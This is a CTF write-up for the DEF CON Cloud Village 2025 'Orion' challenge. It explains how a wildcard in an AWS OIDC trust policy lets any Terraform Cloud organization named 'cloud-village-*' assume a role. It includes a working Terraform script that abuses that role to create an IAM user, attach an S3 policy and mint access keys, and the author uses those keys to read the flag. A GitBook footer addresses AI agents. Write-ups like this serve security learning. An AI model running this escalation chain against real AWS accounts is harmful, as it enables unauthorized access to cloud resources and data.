> For the complete documentation index, see [llms.txt](https://kabinet.gitbook.io/ctf-writeup/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://kabinet.gitbook.io/ctf-writeup/2025/defcon-cloud-village-2025/orion.md).

# Orion

<figure><img src="/files/pXsJaai5LGZMFJYFjqiE" alt=""><figcaption></figcaption></figure>

For this challenge, we are given a tfstate file. tfstate is a terraform state file which is used to deploy infrastructure as code

There is a policy document `s3_access`

<figure><img src="/files/p6j6UrzlThsbgbDhvAE7" alt=""><figcaption></figcaption></figure>

```json
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::dc-33-cv-tf-ctf-bucket-cxc0p38y"
        },
        {
            "Effect": "Allow",
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::dc-33-cv-tf-ctf-bucket-cxc0p38y/flag.txt"
        }
    ]
}

```

The policy allows any user/role attached to retrieve the flag. Lets see which pricipal is the policy is attached to. Scrolling further down, while we aren't able to find who the s3\_access policy is attached to, we found another IAM policy document.

<figure><img src="/files/ipL63pHg6EuXLnwmcimm" alt=""><figcaption></figcaption></figure>

```json
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": [
                "iam:ListUserPolicies",
                "iam:ListAttachedUserPolicies",
                "iam:GetUser",
                "iam:CreateUser"
            ],
            "Resource": "arn:aws:iam::691903504411:user/terraform-dc33-*"
        },
        {
            "Effect": "Allow",
            "Action": [
                "iam:ListAccessKeys",
                "iam:CreateAccessKey"
            ],
            "Resource": "arn:aws:iam::691903504411:user/terraform-dc33-*"
        },
        {
            "Effect": "Allow",
            "Action": "iam:AttachUserPolicy",
            "Resource": "arn:aws:iam::691903504411:user/terraform-dc33-*",
            "Condition": {
                "ArnEquals": {
                    "iam:PolicyArn": "arn:aws:iam::691903504411:policy/S3BucketAccessPolicy"
                }
            }
        }
    ]
}

```

The `terraform_user_management` policy allow the pricipal to attach the S3BucketAccessPolicy to any user starting with `terraform-dc` .

We can also see theres an terraform\_oidc IAM role.

<figure><img src="/files/fJO2k3wmY02iuvEPFNfE" alt=""><figcaption></figcaption></figure>

Looking at the assume role policy, what should immidiately stand out is the wild card in the condition. This basically allow any Terraform Cloud Organization starting with `cloud-village-*` to assume the role.

```json
{
    "Statement": [
        {
            "Action": "sts:AssumeRoleWithWebIdentity",
            "Condition": {
                "StringEquals": {
                    "app.terraform.io:aud": "aws.workload.identity"
                },
                "StringLike": {
                    "app.terraform.io:sub": "organization:cloud-village-*:workspace:dc-33-cv-tf:*"
                }
            },
            "Effect": "Allow",
            "Principal": {
                "Federated": "arn:aws:iam::691903504411:oidc-provider/app.terraform.io"
            }
        }
    ],
    "Version": "2012-10-17"
}
```

We can also see that the `TerraformDC33UserManagement` IAM policy is attached to the `TerraformCloudDC33Role` role.

<figure><img src="/files/YdzUQTI245vIZ0uy22bM" alt=""><figcaption></figcaption></figure>

With that, we have the full exploit chain.

* Assume Role (arn:aws:iam::691903504411:role/TerraformCloudDC33Role),
* Create User (terraform-dc33-\*),
* Attach Policy (S3BucketAccessPolicy) to User,
* Create Access Key for User,
* Get Flag (arn:aws:s3:::dc-33-cv-tf-ctf-bucket-cxc0p38y/flag.txt),

***

First lets create a terraform cloud organization and workspace.

<figure><img src="/files/oN5RqzxCUDG4JpyWcucx" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/vl2Iayqr30W3JYj1CLJy" alt=""><figcaption></figcaption></figure>

Next, I will be creating a Terraform script to automate the exploit chain.

```json
terraform {
  required_providers {
    aws = {
      source  = "hashicorp/aws"
      version = "~> 4.49.0"
    }
  }
  cloud {
    organization = "cloud-village-dietrying"
    workspaces {
      name = "dc-33-cv-tf"
    }
  }
}


provider "aws" {
  region = "us-west-2"
}

resource "aws_iam_user" "terraform_user" {
  name = "terraform-dc33-kabinet"
  path = "/"
}

# Attach the existing policy to the user
resource "aws_iam_user_policy_attachment" "s3_policy_attachment" {
  user       = aws_iam_user.terraform_user.name
  policy_arn = "arn:aws:iam::691903504411:policy/S3BucketAccessPolicy"
}

# Create access key for the user
resource "aws_iam_access_key" "terraform_user_key" {
  user = aws_iam_user.terraform_user.name
}

# Output the access key details
output "access_key_id" {
  value = aws_iam_access_key.terraform_user_key.id
  description = "Access Key ID for terraform-dc33-kabinet user"
}

output "secret_access_key" {
  value = aws_iam_access_key.terraform_user_key.secret
  sensitive = true
  description = "Secret Access Key for terraform-dc33-kabinet user (sensitive)"
}

output "user_arn" {
  value = aws_iam_user.terraform_user.arn
  description = "ARN of the created user"
}

output "user_name" {
  value = aws_iam_user.terraform_user.name
  description = "Name of the created user"
}
```

We will require to authentication to terraform cloud. Running terraform apply, we are able to get the access key and secret access key.

<figure><img src="/files/QrSQv4yEYPMNEkNRlEcI" alt=""><figcaption></figcaption></figure>

Then using the s3 access key and secret access key, we are able to retrieve the flag.

<figure><img src="/files/q5LS0bBfnTJz9mdp2yqM" alt=""><figcaption></figcaption></figure>

***

Reference

[https://developer.hashicorp.com/terraform/tutorials/cloud/dynamic-credentials](https://developer.hashicorp.com/terraform/tutorials/cloud/dynamic-credentialshttps://github.com/hashicorp-education/learn-terraform-dynamic-credentials/tree/main/aws/trust)

[https://github.com/hashicorp-education/learn-terraform-dynamic-credentials/tree/main/aws/trust](https://developer.hashicorp.com/terraform/tutorials/cloud/dynamic-credentialshttps://github.com/hashicorp-education/learn-terraform-dynamic-credentials/tree/main/aws/trust)


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://kabinet.gitbook.io/ctf-writeup/2025/defcon-cloud-village-2025/orion.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
